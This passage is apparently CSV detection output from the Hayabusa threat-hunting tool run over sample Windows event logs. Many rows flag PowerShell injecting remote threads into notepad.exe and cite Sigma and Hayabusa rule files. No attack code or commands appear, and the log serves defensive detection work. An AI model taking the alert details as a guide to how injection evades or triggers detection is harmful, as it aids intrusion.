Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.270 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.270 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.286 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.286 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.286 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.286 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.317 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.317 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.317 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.317 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.333 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.333 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.333 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.333 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.348 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.348 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.348 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.348 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.364 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.364 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.364 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.364 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.380 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.380 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.380 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.380 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.395 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.395 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.395 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.395 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.411 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.411 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.411 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.411 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.426 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.426 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.426 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.426 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.458 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.458 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.458 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.458 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.473 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.473 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.473 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.473 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.489 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.489 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.489 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.489 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.505 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.505 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.505 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.505 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.520 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.520 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.520 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.520 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.536 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.536 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.536 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.536 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.551 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.551 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.551 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.551 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.567 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.567 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.567 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.567 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.583 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.583 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.583 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.583 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.598 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.598 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
